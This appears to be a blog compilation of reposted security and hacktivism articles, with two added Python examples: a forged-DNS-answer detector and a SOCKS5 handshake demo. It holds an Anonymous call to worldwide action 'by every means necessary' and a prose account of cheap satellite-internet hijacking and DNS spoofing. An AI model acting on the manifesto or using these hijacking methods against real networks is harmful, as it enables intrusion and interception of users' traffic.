Anonymous has a way of releasing massive collections of information that raise many more questions than they answer.

Case in point: On Monday night, the segment of the hacker group that calls itself Antisec announced that it had dumped 1,000,001 unique device identifier numbers or UDIDs for Apple devices–the fingerprints that Apple, apps and ad networks use to identify the iPhone and iPads of individual users–that it claims to have stolen from the FBI. In a long statement posted with links to the data on the upload site Pastebin, the hackers said they had taken the Apple data from a much larger database of more than 12 million users’ personal information stored on an FBI computer.

While there’s no easy way to confirm the authenticity or the source of the released data, I downloaded the encrypted file and decrypted it, and it does seem to be an enormous list of 40-character strings made up of numbers and the letters A through F, just like Apple UDIDs. Each string is accompanied by a longer collection of characters that Anonymous says is an Apple Push Notification token and what appears to be a username and an indication as to whether the UDID is attached to an iPad, iPhone or iPod touch.

In their message, posted initially in the Anonymous Twitter feed AnonymousIRC, the hackers say they used a vulnerability in Java to access the data on an FBI Dell laptop in March of this year. They say the database included not only the UDIDs, but also “user names, name of device, type of device, Apple Push Notification Service tokens, zipcodes, cellphone numbers, addresses, etc.” Anonymous claims that the amount of data about each user was highly variable, and that it only released enough data to the public “to help a significant amount of users to look if their device are listed there or not.”

The Antisec statement also took the opportunity to mock the recent appearance of NSA Director and General Keith Alexander at the hacker conference Defcon, where he made a recruiting pitch to attendees. “It was an amusing hypocritical attempt made by the system to flatter hackers into becoming tools for the state,” Anonymous’ statement reads. “We decided we’d help out Internet security by auditing FBI first.”

If the UDIDs are determined to be real, just what that means about law enforcement and Apple users’ privacy isn’t entirely clear. Much more than passwords or even email addresses, UDIDs are already spread around the Internet by app developers and advertisers–a study by one privacy researcher in 2011 found that 74% of the apps he tested sent a user’s UDID to a remote server. But the same researcher also found that five out of seven social gaming networks he tested allowed users to log in with only their UDID, making a stolen UDID equivalent to a stolen password.

“We never liked the concept of UDIDs since the beginning indeed,” reads the Anonymous statement. “Really bad decision from Apple. Fishy thingie.”

Due perhaps to the privacy concerns around UDIDs’ proliferation, Apple stopped allowing new iOS apps to track UDIDs earlier this year.

Regardless, if the FBI has in fact collected 12 million Apple UDIDs–or even just one million–it will have some explaining to do to privacy advocates. In its release, Anonymous argues that the massive dump of users’ personal information, which it says has been stripped of many of the most identifying details, is designed to raise awareness of the FBI’s alleged gadget-tracking shenanigans. “…We will probably see their damage control teams going hard lobbying media with bullshits to discredit this,” the statement reads at one point. “But well, whatever, at least we tried and eventually, looking at the massive number of devices concerned, someone should care about it.”

For now, Anonymous refuses to answer more questions about its release–at least from the press. Before granting any interviews, it’s demanding that Gawker writer Adrian Chen, who has been especially critical of Anonymous, appears on Gawker’s home page in a “huge picture of him dressing a ballet tutu and shoe on the head.”

SOURCE: Forbes.com

Protect Yourself from FBI Manipulation (w/attorney Harvey Silverglate)

Learn how the FBI can manipulate what you say and use it against you, and how to prevent them from doing so! With civil liberties and civil rights attorney Harvey Silverglate.

Remember: if the FBI asks to speak with you, you do not have to talk to them, no matter what they say. The best thing you can do is take the agent’s card and say your lawyer will contact them. Say nothing else, because lying to a federal agent can get you in very serious trouble, and they’ll figure out a way to make it look like you lied. Watch the clip to see how that works. Don’t get caught in their vice; don’t speak to them without your lawyer present. Ever.

#OpBigBrother – EMERGENCY ALERT ABOUT WORLDWIDE SURVEILLANCE FROM ANONYMOUS

For years Anonymous worked hard to protect our world and its peoples.

NOW LISTEN CAREFULLY,
This is an ALERT ABOUT SURVEILLANCE.

Privacy of the people all over the world is suffering more and more outrages. We should not tolerate it. Cameras are everywhere even in our sky, and robots are used to gather and treat information collected through Internet spying.

If Governments and corporations reach their goal to use network surveillance technologies to take control of our world, they will clear Freedom from both the real life and the Internet. That means Anonymous won’t be able to continue helping humanity.
They plan to destroy each form of protest including Anonymous. That means that Anonymous members will be tracked and neutralized if we do not unite against surveillance.

The population is not ready to understand and help us, we need to join the biggest fight ever seen on Anonymous era and use every means necessary to expose truth.

Let the HIVE begin the strongest online and offline worldwide protest ever seen in the history of humanity. They showed they had no limits, we will show our power goes well beyond.

Worldwide governments, evil corporations time of summations is over.

We are Anonymous, we are not numbers, united as one, divided by zero.
Worldwide union will shutdown BigBrother.
That fight will lead us to triumph or to perish.
This is a time trial. WE ACT OR WE FALL.

We are Anonymous,
We are Legion
We do not forgive
We do not forget
Expect us !

=======================================================
Join us on irc.anonops.pro/6697 SSL chan #OpBigBrother

Follow us on twitter : https://twitter.com/OpBigBrother

PAD : https://pad.riseup.net/p/MMhJshLWd6AV

AnonPR On TrapWire: Cops And Feds Are Watching You At All Times

In August 2012, Wikileaks revealed details about a system known as Trapwire that uses facial recognition and other techniques to track and monitor individuals captured on countless different closed-circuit cameras operated by cities and other institutions. The software is billed as a method by which to prevent terrorism, but can of course also be used to provide unprecedented surveillance and data-mining capabilities to governments, corporations, and other institutions, including many with a history of using new technologies to violate the rights of citizens. Trapwire is already used in New York, Los Angeles, Las Vegas, Texas, DC, London, and other locales.

The ex-CIA agents who help run the firm are old friends of Stratfor vice president Fred Burton, whom they’ve briefed on their own capabilities in e-mails obtained by Anonymous hackers and provided to Wikileaks. Stratfor has engaged in at least several surveillance operations against activists, such as those advocating for victims of the Bhopal disaster, on behalf of large U.S. corporations; Burton himself was revealed to have advocated “bankrupting” and “ruining the life” of activists like Julian Assange in e-mails to other friends.

Trapwire can be extremely expensive to maintain, and is usually done so at taxpayer expense; Los Angeles county spent over $1.4 million dollars on the software’s use in a single three-month period of 2007.

Although most of the regions in which Trapwire operates don’t share information with each other, all of this is set to change; as Abraxas Applications president Dan Botsch told Burton via e-mail, “I think over time the different networks will begin to unite,” noting that several networks had already begun discussions on merging their information. Abraxas itself has always had the ability to “cross-network matches” from every region at their own office. By June 2011, Washington D.C. police were engaged in a pilot project under the Department of Homeland Security that’s likely to lead to more cities using Trapwire on a more integrated basis.

Abraxas, the firm whose spin-off Abraxas Applications developed Trapwire in 2007, has long been involved in a lesser-known practice known as persona management, which involves the use of fake online “people” to gather intelligence and/or disseminate disinformation. The firm Ntrepid, created by Abraxas owner Cubic Corporation, won a 2010 CENTCOM contract to provide such capabilities for use in foreign countries; several board members of Ntrepid also sit on Abraxas.

TrapWire®

TrapWire is a unique, predictive software system designed to detect patterns indicative of terrorist attacks or criminal operations. Utilizing a proprietary, rules-based engine, TrapWire detects, analyzes and alerts on suspicious events as they are collected over periods of time and across multiple locations. Through the systematic capture of these pre-attack indicators, terrorist or criminal surveillance and pre-attack planning operations can be identified — and appropriate law enforcement counter measures employed ahead of the attack. As such, our clients are provided with the ability to prevent the terrorist or criminal event, rather than simply mitigate damage or loss of life.

 

 

How To Hack Satellite Internet & Surf Anonymously

A Spanish researcher demos new satellite-hijacking tricks with cybercriminal potential.

Satellites can bring a digital signal to places where the Internet seems like a miracle: off-the-grid desert solar farms, the Arctic or an aircraft carrier at sea. But in beaming data to and from the world’s most remote places, satellite Internet may also offer its signal to a less benign recipient: any digital miscreant within thousands of miles.

In a presentation at the Black Hat security conference in Arlington, Va., Tuesday, Spanish cybersecurity researcher Leonardo Nve presented a variety of tricks for gaining access to and exploiting satellite Internet connections. Using less than $75 in tools, Nve, a researcher with security firm S21Sec, says that he can intercept Digital Video Broadcast (DVB) signals to get free high-speed Internet. And while that’s not a particularly new trick–hackers have long been able to intercept satellite TV or other sky-borne signals–Nve also went a step further, describing how he was able to use satellite signals to anonymize his Internet connection, gain access to private networks and even intercept satellite Internet users’ requests for Web pages and replace them with spoofed sites.

“What’s interesting about this is that it’s very, very easy,” says Nve. “Anyone can do it: phishers or Chinese hackers … it’s like a very big Wi-Fi network that’s easy to access.”

In a penetration test on a client’s network, Nve used a Skystar 2 PCI satellite receiver card, a piece of hardware that can be bought on eBay for $30 or less, along with open source Linux DVB software applications and the network data analysis or “sniffing” tool Wireshark.

Exploiting that signal, Nve says he was able to impersonate any user connecting to the Internet via satellite, effectively creating a high-speed, untraceable anonymous Internet connection that can be used for nefarious online activities.

Nve also reversed the trick, impersonating Web sites that a satellite user is attempting to visit by intercepting a Domain Name System (DNS) request–a request for an Internet service provider (ISP) to convert a spelled out Web site name into the numerical IP address where it’s stored–and sending back an answer faster than the ISP. That allows him to replace a Web site that a user navigates to directly with a site of his choosing, creating the potential for undetectable cybercrime sites that steal passwords or install malicious software.
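When a forged DNS answer wins the race described above, the ISP's genuine answer usually still arrives a moment later, so a monitor on the client side sees two responses to one query that disagree. The following is an added example of that detection check, not code from the article or from Nve's talk; the record layout, the addresses and the 2-second window are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample of DNS responses seen at one monitoring point:
# (arrival time in seconds, client IP, DNS transaction ID, queried name, answer IPs)
SAMPLE_RESPONSES = [
    # Two answers to the same query that disagree: the pattern of a lost/won race.
    (10.000, "192.0.2.10", 0x1A2B, "www.example.com", ("203.0.113.66",)),
    (10.310, "192.0.2.10", 0x1A2B, "www.example.com.", ("198.51.100.7",)),
    # Benign retransmission: same query, identical answer.
    (11.000, "192.0.2.10", 0x3C4D, "mail.example.com", ("198.51.100.25",)),
    (11.002, "192.0.2.10", 0x3C4D, "mail.example.com", ("198.51.100.25",)),
    # Same transaction ID reused by a different client: unrelated query.
    (12.500, "192.0.2.11", 0x1A2B, "www.example.com", ("198.51.100.7",)),
]


def find_conflicting_answers(responses, window_s=2.0):
    """Return one alert per query that received differing answers within window_s.

    Responses are grouped by (client, transaction ID, normalised name). Answer
    sets are compared as sets, so a reordered but identical answer is ignored.
    Load-balanced names can legitimately vary, so alerts need triage.
    """
    grouped = defaultdict(list)
    for ts, client, txid, qname, answers in responses:
        key = (client, txid, qname.lower().rstrip("."))
        grouped[key].append((ts, frozenset(answers)))

    alerts = []
    for (client, txid, qname), seen in grouped.items():
        seen.sort(key=lambda item: item[0])
        first_ts, first_answers = seen[0]
        for ts, answers in seen[1:]:
            if ts - first_ts > window_s:
                break  # too late to be the other half of the same race
            if answers != first_answers:
                alerts.append({
                    "client": client,
                    "txid": txid,
                    "qname": qname,
                    "first_answer": sorted(first_answers),
                    "later_answer": sorted(answers),
                    "gap_s": round(ts - first_ts, 3),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in find_conflicting_answers(SAMPLE_RESPONSES):
        print(alert)
```

The first answer to arrive is the one the client acts on, so in an alert the `first_answer` field is the value to investigate.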

In his tests on the client’s network, Nve says he was also able to hijack signals using GRE or TCP protocols that enterprises use to communicate between PCs and servers or between offices, using the connections to gain access to a corporation or government agency’s local area network.

The Barcelona-based researcher tested his methods on geosynchronous satellites aimed at Europe, Africa and South America. But he says there’s little doubt that the same tricks would work on satellites facing North America or anywhere else.

What makes his attacks possible, Nve says, is that DVB signals are usually left unencrypted. That lack of simple security, he says, stems from the logistical and legal complications of scrambling the signal, which might make it harder to share data among companies or agencies and–given that a satellite signal covers many countries–could run into red tape surrounding international use of cryptography. “Each [country] can have its own law for crypto,” says Nve. “It’s easier not to have encryption at the DVB layer.”

Nve isn’t the first to show the vulnerability of supposedly secure satellite connections. John Walker, a British satellite enthusiast, told the BBC in 2002 that he could watch unencrypted NATO video feeds from surveillance sorties in the Balkans. And the same lack of encryption allowed insurgents to hack into the video feed of unmanned U.S. drone planes scouting Afghanistan, the Wall Street Journal reported in December.

In fact, the techniques that Nve demonstrated are probably known to other satellite hackers but never publicized, says Jim Geovedi, a satellite security researcher and consultant with the firm Bellua in Indonesia. He compares satellite hacking to early phone hacking or “phreaking,” a practice that’s not well protected against but performed by only a small number of people worldwide. “This satellite hacking thing is still considered blackbox knowledge,” he wrote in an e-mail to Forbes. “I believe there are many people out there who conduct similar research. They may have some cool tricks but have kept them secret for ages.”

At last year’s Black Hat D.C. conference, British cybersecurity researcher Adam Laurie demonstrated how he intercepts satellite signals with techniques similar to Nve, using a DreamBox satellite receiver and Wireshark. But Nve argues that his method is far cheaper–Laurie’s DreamBox setup cost around $750–and that he’s the first to demonstrate satellite signal hijacking rather than mere interception.

“I’m not just talking about watching TV,” says Nve. “I’m talking about doing some very scary things.”

 

 

At 12:57 PM, Anonymous satellite_hacker said…

Satellite hacking for fun isn’t cheap! One of the sessions I was really looking forward to ahead of the Black Hat DC event this year was Adam Laurie’s session titled – Satellite Hacking for Fun and Profit.

It’s a session that didn’t disappoint, Laurie is always entertaining, but it also revealed how much effort is actually required to try and get at satellite signals.

First off, Laurie prefaced his talk by noting that he wasn’t going to talk about hacking the actual satellite in space itself.

“I’m playing it safe and just looking at what is coming down,” Laurie told the Black Hat audience.

Instead what Laurie focused his talk on was something he called ‘Feed Hunting’ – that is looking for satellite feeds that are not supposed to be found. Laurie claimed that he has been doing satellite feed hunting for years – at least as far back as the untimely demise of the late Princess Diana in 1997. Laurie claimed that he was able to find a non-public feed from a TV broadcaster that had left their transponder on in a Paris hotel room.

Fast forward a dozen years and Laurie commented that the technology to identify satellite feeds has progressed dramatically. Among the reasons why satellite feed hunting has gotten easier is an open source based satellite receiver called the dreambox.

Laurie explained that the dreambox has a web interface that makes it easier to find streams and provides information on what the stream includes. Another open source technology also helps to feed hunt satellite content.

A project called dvbsnoop is a DVB (digital video broadcasting) and MPEG stream analyzer that lets the user access raw data from a DVB card. By sifting through the raw data, Laurie demonstrated that interesting satellite feeds that weren’t intended to be public could be found.

Going a step further, Laurie claimed that he had created his own python based script called dreaMMap that could create a 3d model of satellite frequency transmissions. With the 3D model the user just does a point and click to steer the dish to a particular satellite frequency. One member of the Black Hat audience asked Laurie if what he was doing was legal. Laurie shrugged and commented:

“I’m in the US giving a talk where I’m tunneled to my server in the UK and looking at a satellite in space that is over Africa – so who would get me?”

All told there is a financial cost to Laurie’s satellite feed hunting techniques – and that cost is approximately $785 for the Dreambox hardware, the actual satellite dish and then the motor and the mount for the dish. Well I guess if you’ve got the money to burn…

SOURCE: Satellite Internet Blog

VPN vs. SSH Tunnel: Which Is More Secure?

VPNs and SSH tunnels can both securely “tunnel” network traffic over an encrypted connection. They’re similar in some ways, but different in others – if you’re trying to decide which to use, it helps to understand how each works.

An SSH tunnel is often referred to as a “poor man’s VPN” because it can provide some of the same features as a VPN without the more complicated server setup process – however, it has some limitations.

How a VPN Works

VPN stands for “virtual private network,” – as its name indicates, it’s used for connecting to private networks over public networks, such as the Internet. In a common VPN use case, a business may have a private network with file shares, networked printers, and other important things on it. Some of the business’s employees may travel and frequently need to access these resources from the road. However, the business doesn’t want to expose their important resources to the public Internet. Instead, the business can set up a VPN server and employees on the road can connect to the company’s VPN. Once an employee is connected, their computer appears to be part of the business’s private network – they can access file shares and other network resources as if they were actually on the physical network.

The VPN client communicates over the public Internet and sends the computer’s network traffic through the encrypted connection to the VPN server. The encryption provides a secure connection, which means the business’s competitors can’t snoop on the connection and see sensitive business information. Depending on the VPN, all the computer’s network traffic may be sent over the VPN – or only some of it may (generally, however, all network traffic goes through the VPN). If all web browsing traffic is sent over the VPN, people between the VPN client and server can’t snoop on the web browsing traffic. This provides protection when using public Wi-Fi networks and allows users to access geographically-restricted services – for example, the employee could bypass Internet censorship if they’re working from a country that censors the web. To the websites the employee accesses through the VPN, the web browsing traffic would appear to be coming from the VPN server.

Crucially, a VPN works more at the operating system level than the application level. In other words, when you’ve set up a VPN connection, your operating system can route all network traffic through it from all applications (although this can vary from VPN to VPN, depending on how the VPN is configured). You don’t have to configure each individual application.

To get started with your own VPN, see our guides to using OpenVPN on a Tomato router, installing OpenVPN on a DD-WRT router, or setting up a VPN on Debian Linux.

How an SSH Tunnel Works

SSH, which stands for “secure shell,” isn’t designed solely for forwarding network traffic. Generally, SSH is used to securely acquire and use a remote terminal session – but SSH has other uses. SSH also uses strong encryption, and you can set your SSH client to act as a SOCKS proxy. Once you have, you can configure applications on your computer – such as your web browser – to use the SOCKS proxy. The traffic enters the SOCKS proxy running on your local system and the SSH client forwards it through the SSH connection – this is known as SSH tunneling. This works similarly to browsing the web over a VPN – from the web server’s perspective, your traffic appears to be coming from the SSH server. The traffic between your computer and the SSH server is encrypted, so you can browse over an encrypted connection as you could with a VPN.

However, an SSH tunnel doesn’t offer all the benefits of a VPN. Unlike with a VPN, you must configure each application to use the SSH tunnel’s proxy. With a VPN, you’re assured that all traffic will be sent through the VPN – but you don’t have this assurance with an SSH tunnel. With a VPN, your operating system will behave as though you’re on the remote network – which means connecting to Windows networked file shares would be easy. It’s considerably more difficult with an SSH tunnel.

For more information about SSH tunnels, see this guide to creating an SSH tunnel on Windows with PuTTY. To create an SSH tunnel on Linux, see our list of cool things you can do with an SSH server.
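
The per-application limitation described above, as an added example that is not part of the original article: the SOCKS5 exchange (RFC 1928) between an application and the local proxy an SSH client opens, for instance with OpenSSH's `ssh -D`. It shows that the tunnel carries only what the application hands it: a host name sent to the proxy is resolved at the far end, while an application that resolves names itself sends a bare IP, so its DNS query already left over the local network. The proxy side is a constructed stand-in on a local socket pair, and the destinations and port are constructed sample values.

```python
import ipaddress
import socket
import struct
import threading

VER, NO_AUTH, CMD_CONNECT = 0x05, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04


def build_connect(host, port):
    """SOCKS5 CONNECT request (RFC 1928 section 4) for host:port."""
    try:
        ip = ipaddress.ip_address(host)      # the application already holds an IP
        atyp = ATYP_IPV4 if ip.version == 4 else ATYP_IPV6
        addr = ip.packed
    except ValueError:                       # a name: let the far end resolve it
        name = host.encode("idna")
        if not 1 <= len(name) <= 255:
            raise ValueError("hostname must be 1..255 bytes")
        atyp, addr = ATYP_DOMAIN, bytes([len(name)]) + name
    return bytes([VER, CMD_CONNECT, 0x00, atyp]) + addr + struct.pack("!H", port)


def parse_connect(req):
    """Decode a CONNECT request as the proxy end of the tunnel sees it."""
    if len(req) < 5 or req[0] != VER or req[1] != CMD_CONNECT:
        raise ValueError("not a SOCKS5 CONNECT request")
    atyp = req[3]
    if atyp == ATYP_DOMAIN:
        end = 5 + req[4]                     # length byte, then the name
        dest = req[5:end].decode("ascii")
    elif atyp in (ATYP_IPV4, ATYP_IPV6):
        end = 4 + (4 if atyp == ATYP_IPV4 else 16)
        dest = str(ipaddress.ip_address(req[4:end]))
    else:
        raise ValueError("unknown address type")
    if len(req) != end + 2:
        raise ValueError("truncated or oversized request")
    (port,) = struct.unpack("!H", req[end:])
    return {"dest": dest, "port": port, "name_in_tunnel": atyp == ATYP_DOMAIN}


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def client_handshake(sock, host, port):
    """Application side: offer 'no authentication', then ask for host:port."""
    sock.sendall(bytes([VER, 1, NO_AUTH]))
    if recv_exact(sock, 2) != bytes([VER, NO_AUTH]):
        raise ConnectionError("proxy refused the no-auth method")
    sock.sendall(build_connect(host, port))
    reply = recv_exact(sock, 10)             # VER REP RSV ATYP BND.ADDR(4) BND.PORT(2)
    return reply[1] == 0x00                  # REP 0x00 = succeeded


def stand_in_proxy(sock, seen):
    """Constructed stand-in for the SOCKS listener; records the destination."""
    with sock:
        _ver, nmethods = recv_exact(sock, 2)
        recv_exact(sock, nmethods)
        sock.sendall(bytes([VER, NO_AUTH]))
        head = recv_exact(sock, 5)           # VER CMD RSV ATYP + first address byte
        rest = {ATYP_IPV4: 3, ATYP_IPV6: 15}.get(head[3], head[4]) + 2
        seen.append(parse_connect(head + recv_exact(sock, rest)))
        sock.sendall(bytes([VER, 0x00, 0x00, ATYP_IPV4]) + bytes(6))


def what_the_tunnel_sees(host, port):
    """Run one handshake over a local socket pair; return the proxy's view."""
    app, proxy = socket.socketpair()
    seen = []
    worker = threading.Thread(target=stand_in_proxy, args=(proxy, seen))
    worker.start()
    try:
        ok = client_handshake(app, host, port)
    finally:
        app.close()
        worker.join()
    return ok, seen[0]


if __name__ == "__main__":
    # Constructed destinations: a name handed to the proxy vs. an IP the
    # application resolved itself (that DNS query never entered the tunnel).
    for target in ("intranet.example", "192.0.2.10"):
        print(target, what_the_tunnel_sees(target, 443))
```

When auditing an application configured for the tunnel, the address type in its CONNECT request tells you whether name lookups are travelling inside the encrypted connection or not.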

Which Is More Secure?

If you’re worried about which is more secure for business use, the answer is clearly a VPN — you can force all network traffic on the system through it. However, if you just want an encrypted connection to browse the web with from public Wi-Fi networks in coffee shops and airports, a VPN and SSH server both have strong encryption that will serve you well.

There are other considerations, too. Novice users can easily connect to a VPN, but setting up a VPN server is a more complex process. SSH tunnels are more daunting to novice users, but setting up an SSH server is simpler – in fact, many people will already have an SSH server that they access remotely. If you already have access to an SSH server, it’s much easier to use it as an SSH tunnel than it is to set up a VPN server. For this reason, SSH tunnels have been dubbed a “poor man’s VPN.”

Businesses looking for more robust networking will want to invest in a VPN. On the other hand, if you’re a geek with access to an SSH server, an SSH tunnel is an easy way to encrypt and tunnel network traffic – and the encryption is just as good as a VPN’s encryption.

 

SOURCE: HowToGeek.com

Attention Activists: Your Phone May Not Be Safe at Protests

Ever wondered why your cell phone reception suddenly becomes terrible at protests? Ever worried that police could use electronic spoofing devices to suck up your mobile data because you are in the streets exercising your rights?

You might have been onto something.

Mobile “IMSI catchers”, currently on the market and being pushed to police and intelligence agencies worldwide, enable these creepy, stealth spying tactics. And if they build it and hawk it, history tells us police will buy it and deploy it.

On Tuesday, July 3, 2012, electronic privacy advocate and technology researcher Chris Soghoian tweeted a link to a photograph of a talk he gave at TED in Scotland in late June. Behind him in the photograph is another image, this one taken by privacy researcher Eric King at a surveillance trade show. (King’s Twitter bio contains a quote from a representative of the notorious ISS World — a global surveillance trade firm that often hosts such trade shows: the rep called him an “Anti-lawful interception zealot blogger.” High praise.)

Look at the slide behind Soghoian; that’s the photo in question. It shows an IMSI catcher strapped onto a model, under the model’s shirt.

IMSI stands for “International Mobile Subscriber Identity”. The technology is essentially a mobile phone tower with “a malicious operator”. It mimics the behavior of a cell tower and tricks mobile phones into sending data to it, instead of to the tower.

As such it is considered a Man In the Middle (MITM) attack. It is an eavesdropping device used for interception and tracking of cellular phones, and it is usually undetectable to the users of mobile phones.

Once it has made a connection with the phone and tricked it into thinking it is a mobile tower, the IMSI catcher forces the phone to drop its encryption, enabling easy access to the contents of the device. The tool then lets the attacker listen in on mobile conversations and intercept all data sent from a mobile phone, remaining undetected. In some cases the tool also allows the operator to manipulate messages.

Here’s a creepy video that a purveyor of IMSI catchers made to advertise its product:

Police in the United States claim they do not need a warrant to use an IMSI catcher or other spoofing device to track your location. A case to determine whether or not the courts agree is working itself through the system.

Privacy International’s Eric King took the photo on the slide behind Soghoian at a surveillance trade show, where he says the tool was “pitched to me as being perfect for covert operations in public order situations.” In other words, at protests. 

 

The FBI uses IMSI catchers and claims it does so legally, even though it says it doesn’t need a warrant to deploy them. The Electronic Privacy Information Center is currently pursuing FOIA litigation to find out exactly how the bureau uses the “Stingray” (a brand name IMSI catcher); unsurprisingly, the FBI wasn’t forthcoming with documents to reveal its legal standard or other information about how it uses the tool. Stay tuned for more information as that case makes its way through the courts.

Meanwhile, how can you protect yourself against IMSI catchers? Unfortunately, you probably can’t. And the threats are not just from government. As Soghoian and others warned in a friend of the court brief,

Finally, the communications privacy of millions of law-abiding Americans is already threatened by the use of this and similar interception technologies by non-US government entities, such as stalkers, criminals, and foreign governments engaged in espionage. As such, the public interest is best served by greater public discussion regarding these tracking technologies and the security flaws in the mobile phone networks that they exploit, not less.

Yet again, we are faced with a situation in which our technology has outpaced our law reform. It’s time for Congress to change that.


To get a more detailed sense of how the technology actually works, watch this excellent talk from DefCon 2011, with Chris Paget: “Practical Cellphone Spying”. He spoofs the phones of the people in the audience during the talk; it’s well worth watching if you have some time.

 

For more on IMSI catchers and the state of the law, click here.

 

SOURCE: PrivacySOS

Make it Happen 2012 – Anonymous Transmission

Protesting, Police Violence, Transparency, Global Government, all being manipulated against Humanity’s interests.  2012 is the year we take back our FREEDOMS.

We do not forgive

We do not forget

We are legion

Expect us

 

 

RELEASED: Alan Turing Notes on Cryptography

Are there any insights left to be wrung from the code breaker’s papers?

Chris Vallance of the BBC reports that GCHQ has released some of Alan Turing’s papers on the theory of code breaking. They’re not on display at the National Archives at Kew. I’ve checked the web pages of the Archives and GCHQ, and there is as of my writing nothing up there, yet.

The two papers are titled “The Applications of Probability to Crypt” and “Paper on the Statistics of Repetitions.” They discuss the application of mathematics to cryptanalysis. This might seem a bit obvious now, but at the time cryptanalysis was largely done by smart people and not by machines. A code-breaker was more likely someone who was good at solving complex crossword puzzles than working with numbers. It was unusual to bring in someone like Turing to a cryptology lab.

It wasn’t until machine cryptography was developed after WWI that codes were developed that were so complex humans couldn’t break them. The Enigma machine is the most famous, but there were others used all around the world.

However, using statistics has been a staple of code-breakers for centuries. It was used by British code-breaker George Scovell to break Napoleon’s codes back in the early 1800s.

The BBC quotes a GCHQ mathematician as saying that the papers discuss “mathematical analysis to try and determine which are the more likely settings so that they can be tried as quickly as possible.” Indeed, we know that the Enigma codes were broken daily through flaws in distributing daily settings for the code machines themselves as much as breaking the actual cryptography.

It will be interesting to see what is in those papers. GCHQ says they have squeezed all the juice out of them, and therefore they are not likely to hold surprises for us in the private sector. Nonetheless, many of us will be interested in reading Turing’s words on the subjects.

Jon Callas is a renowned information security expert and CTO of Entrust.

Source: http://blogs.computerworlduk.com/security-spotlight/2012/04/alan-turing-notes-on-cryptography-released/index.htm

Why Hillary Clinton Should Join Anonymous

The State Department and the online mob are both destroying “Internet freedom.”

 

It’s hard to deny the intellectual ambiguity of “Internet freedom” when among its staunchest defenders are idealistic hacktivists from Anonymous and hard-nosed diplomats from the U.S. State Department—two groups that otherwise disagree on everything else. Ironically, both may end up hurting the very noble cause that they seek to promote.

The diplomats’ problems are quite well-known by now. While Hillary Clinton likes to give speeches in which she fashions herself the world’s greatest defender of “Internet freedom,” the harsh reality is that her own government is its greatest enemy. Given the never-ending flow of draconian copyright and cybersecurity laws coming from Washington, this fact is getting harder and harder to conceal from the global public, who starts to wonder why American diplomats keep criticizing Russia or China but don’t say anything about the impressive online spying operation that the National Security Agency is building in Utah. Nor does the State Department object when America’s allies push for harsh surveillance laws; Britain, with its proposed surveillance legislation, is a case in point. America’s “Internet freedom agenda” is at best toothless and at worst counterproductive. While focusing on (and overselling) the liberating promise of social media in authoritarian regimes, it conceals a number of emerging domestic threats that have nothing to do with dictators—and everything to do with aggressive surveillance, disappearing privacy, and the astonishing greed of Silicon Valley.

The case of Anonymous is not as straightforward. This movement is so distributed, fluid, and occasionally disorganized that anyone seeking to pigeonhole it into a coherent ideological doctrine would not get too far. Still, most of its recent high-profile attacks—upon the intelligence firm Stratfor, the Central Intelligence Agency, the signatories of the Anti-Counterfeiting Trade Agreement (which, among other things, aims to thwart Internet piracy), and the Chinese government—are motivated by a desire to defend “Internet freedom.” In this lofty goal, the agendas, if not the approaches, of Anonymous and the State Department overlap.

Why these particular targets? Predictably, Anonymous hates Western governments for ushering in more surveillance and draconian piracy laws; the security industry—for satisfying the growing policing demands of those governments; the Chinese government—for being the world’s mightiest Internet censor.

Such flashy attacks are still widely discussed in the media, and that can inspire valuable broader discussion of some important Internet issues, such as the controversial Cyber Intelligence Sharing and Protection Act. But spectacles, which are bound to get boring, are not a sustainable political strategy, as the media will eventually lose interest. And Anonymous has yet to go beyond spectacle and offer a more meaningful way for its members to contribute. Cyberattacks are cheap, easy, and can attract thousands of participants without demanding much of them. In this, they can be seen as a form of “slacktivism”—they make everyone feel good but don’t necessarily advance the cause. They can be great for stunts, but one can’t change the world with stunts alone.

But—yet another parallel to the State Department—it’s not just that Anonymous’ campaigns might be toothless. They may prove counterproductive as well. The cybersecurity industry has almost certainly benefited from the buzz and fear-mongering generated by Anonymous’ attacks. Every new incursion by Anonymous must be greeted as good news in the offices of companies providing cyberdefense to both public and private sectors. Now that Anonymous has revealed that even private intelligence-gathering firms are not safe—a few months ago, it obtained the emails from Stratfor, which eventually were published by WikiLeaks—it’s a great time to be a provider of cybersecurity services!

The hacktivists keep supplying the industry with strong examples as to why more public money should be spent beefing up Internet security and surveillance while eliminating online anonymity. Take Anonymous’ recent assaults on the websites of USTelecom and Tech America, two leading technology trade associations that have lent their support to CISPA. It doesn’t take a genius to realize that a cyberattack against groups that promote legislation to combat cyberattacks only strengthens their case. It’s like shooting a bazooka in a legislative session about gun control. This was not lost on those trade associations, and they exploited this gift from Anonymous to its fullest. Thus, the president of USTelecom claimed that “by their actions Anonymous hacktivists underscore the importance of speedy action on the bipartisan [CISPA] legislation to ensure that the Internet remains an open and safe forum for all.” Regardless of what happens to this particular piece of legislation, it’s likely that lawmakers will be under growing pressure from the military-digital complex to do something about Anonymous’ attacks—and that “something” would not be conducive to any kind of “Internet freedom.”

We can expect similar developments to take place in China, where in early April a group that calls itself “Anonymous China” defaced several government websites and promised to take down its notorious censorship system. The damage caused is minimal, while the symbolic value derived from exposing the Chinese Internet censorship to the international audiences is arguably insignificant. It’s already a well-known problem. But Anonymous’ attacks do give the Chinese government good reasons to invest money into online surveillance and, perhaps, even do it with popular support: Anonymous is not above exposing credit card details of innocent victims—and China’s burgeoning middle classes will easily grasp the implications of online insecurity. If the strikes continue, Anonymous may be China’s equivalent of Stuxnet—the computer worm that disrupted Iranian nuclear facilities—only without imposing any of Stuxnet’s crippling costs. Iran’s ongoing flirtation with the idea of a “national Internet,” itself a reaction in part to Stuxnet, is a good example of how the rhetoric of cyberattacks may be invoked to justify more Internet control.

Why doesn’t Anonymous seek more effective means of cyberactivism? This is where the organization’s decentralized structure is a liability, not an asset. The movement claims to have no leaders—well, aside from those “leaders” who happen to be working for the FBI—and that means short-term, easy objectives (often bordering on pranks) can take precedence over long-term strategic goals.

